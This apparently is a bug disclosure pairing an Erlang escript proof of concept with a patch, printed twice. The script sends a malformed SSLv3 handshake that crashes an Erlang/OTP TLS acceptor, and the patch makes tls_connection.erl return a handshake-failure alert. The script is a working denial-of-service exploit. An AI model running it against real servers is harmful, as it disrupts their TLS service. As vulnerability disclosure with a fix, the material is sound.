stolen/badhandshake.escript

## badhandshake.escript
#!/usr/bin/env escript
%% -*- mode: erlang -*-
%% vim: sw=2 ts=2
% This escript sends garbage SSLv3 record between client_hello and any other record
% to specified server causing acceptor to crash with function_clause
%
% Usage example:    ./badhandshake.escript localhost 9998

-module(badhandshake).
-include_lib("ssl/src/ssl_handshake.hrl").

client_hello() ->
  [<<22, 3,0, 145:16>>,
   <<1,0,0,141,3,2,83,80,4,31,206,23,107,223,241,244,
     164,4,198,176,44,155,63,58,157,103,95,44,198,83,
     237,110,165,99,242,190,122,83,32,11,15,20,173,
     67,209,70,180,252,109,228,108,60,203,91,126,77,
     12,231,203,43,221,11,234,147,28,231,91,18,49,
     228,70,0,36,0,51,0,69,0,57,0,136,0,22,0,50,0,68,
     0,56,0,135,0,19,0,102,0,47,0,65,0,53,0,132,0,10,
     0,5,0,4,1,0,0,32,0,9,0,3,2,0,1,0,0,0,21,0,19,0,
     0,16,119,101,98,100,97,118,46,121,97,110,100,
     101,120,46,114,117>>
  ,<<22, 3,0, 10:16>>, % one more record
   92,64,37,228,209, 208,235,232,47,69 % garbage
  ].

change_cipher() ->
  [20,<<0,0,12>>,<<111,40,244,7,137,224,16,109,197,110,249,152>>].

main([Host, PortStr]) ->
  run(Host, list_to_integer(PortStr)).

run(Host, Port) ->
  {ok, S} = gen_tcp:connect(Host, Port, [binary, {active, false}]),
  ok = gen_tcp:send(S, client_hello()),
  {ok, <<22, RecMajor:8, RecMinor:8, _RecLen:16, 2, HelloLen:24>>} = gen_tcp:recv(S, 9, 10000),
  {ok, <<HelloBin:HelloLen/binary>>} = gen_tcp:recv(S, HelloLen, 5000),
  #server_hello{} = ServerHello = tls_handshake:decode_handshake({RecMajor, RecMinor}, 2, HelloBin),
  #server_hello{
    server_version = ServerVer,
    cipher_suite = CipherSuite } = ServerHello,
  io:format("Received server_hello of version ~w with cipher suite ~w~n", [ServerVer, ssl:suite_definition(CipherSuite)]),
  send_more(S).

send_more(S) ->
  ok = gen_tcp:send(S, change_cipher()),
  {ok, <<RecType:8, _RecMajor:8, _RecMinor:8, RecLen:16>>} = gen_tcp:recv(S, 5, 10000),
  {ok, <<Frag:RecLen/binary>>} = gen_tcp:recv(S, RecLen, 5000),
  io:format("Received record type ~w: ~160P~n", [RecType, Frag, 10]).

## handshake_function_clause.patch
--- lib/ssl/src/tls_connection.erl.orig	2014-04-18 19:28:41.891724806 +0400
+++ lib/ssl/src/tls_connection.erl	2014-04-18 19:37:04.419506058 +0400
@@ -751,7 +751,11 @@
 	    handle_tls_handshake(Handle, NextStateName, State);
 	{stop, _,_} = Stop ->
 	    Stop
-    end.
+    end;
+
+handle_tls_handshake(_Handle, _StateName, #state{}) ->
+    throw(?ALERT_REC(?FATAL, ?HANDSHAKE_FAILURE)).
+
 write_application_data(Data0, From,
 		       #state{socket = Socket,
 			      negotiated_version = Version,
	#!/usr/bin/env escript
	%% -- mode: erlang --
	%% vim: sw=2 ts=2
	% This escript sends garbage SSLv3 record between client_hello and any other record
	% to specified server causing acceptor to crash with function_clause
	%
	% Usage example: ./badhandshake.escript localhost 9998

	-module(badhandshake).
	-include_lib("ssl/src/ssl_handshake.hrl").

	client_hello() ->
	[<<22, 3,0, 145:16>>,
	<<1,0,0,141,3,2,83,80,4,31,206,23,107,223,241,244,
	164,4,198,176,44,155,63,58,157,103,95,44,198,83,
	237,110,165,99,242,190,122,83,32,11,15,20,173,
	67,209,70,180,252,109,228,108,60,203,91,126,77,
	12,231,203,43,221,11,234,147,28,231,91,18,49,
	228,70,0,36,0,51,0,69,0,57,0,136,0,22,0,50,0,68,
	0,56,0,135,0,19,0,102,0,47,0,65,0,53,0,132,0,10,
	0,5,0,4,1,0,0,32,0,9,0,3,2,0,1,0,0,0,21,0,19,0,
	0,16,119,101,98,100,97,118,46,121,97,110,100,
	101,120,46,114,117>>
	,<<22, 3,0, 10:16>>, % one more record
	92,64,37,228,209, 208,235,232,47,69 % garbage
	].

	change_cipher() ->
	[20,<<0,0,12>>,<<111,40,244,7,137,224,16,109,197,110,249,152>>].

	main([Host, PortStr]) ->
	run(Host, list_to_integer(PortStr)).

	run(Host, Port) ->
	{ok, S} = gen_tcp:connect(Host, Port, [binary, {active, false}]),
	ok = gen_tcp:send(S, client_hello()),
	{ok, <<22, RecMajor:8, RecMinor:8, _RecLen:16, 2, HelloLen:24>>} = gen_tcp:recv(S, 9, 10000),
	{ok, <<HelloBin:HelloLen/binary>>} = gen_tcp:recv(S, HelloLen, 5000),
	#server_hello{} = ServerHello = tls_handshake:decode_handshake({RecMajor, RecMinor}, 2, HelloBin),
	#server_hello{
	server_version = ServerVer,
	cipher_suite = CipherSuite } = ServerHello,
	io:format("Received server_hello of version ~w with cipher suite ~w~n", [ServerVer, ssl:suite_definition(CipherSuite)]),
	send_more(S).

	send_more(S) ->
	ok = gen_tcp:send(S, change_cipher()),
	{ok, <<RecType:8, _RecMajor:8, _RecMinor:8, RecLen:16>>} = gen_tcp:recv(S, 5, 10000),
	{ok, <<Frag:RecLen/binary>>} = gen_tcp:recv(S, RecLen, 5000),
	io:format("Received record type ~w: ~160P~n", [RecType, Frag, 10]).
	--- lib/ssl/src/tls_connection.erl.orig 2014-04-18 19:28:41.891724806 +0400
	+++ lib/ssl/src/tls_connection.erl 2014-04-18 19:37:04.419506058 +0400
	@@ -751,7 +751,11 @@
	handle_tls_handshake(Handle, NextStateName, State);
	{stop, _,_} = Stop ->
	Stop
	- end.
	+ end;
	+
	+handle_tls_handshake(_Handle, _StateName, #state{}) ->
	+ throw(?ALERT_REC(?FATAL, ?HANDSHAKE_FAILURE)).
	+
	write_application_data(Data0, From,
	#state{socket = Socket,
	negotiated_version = Version,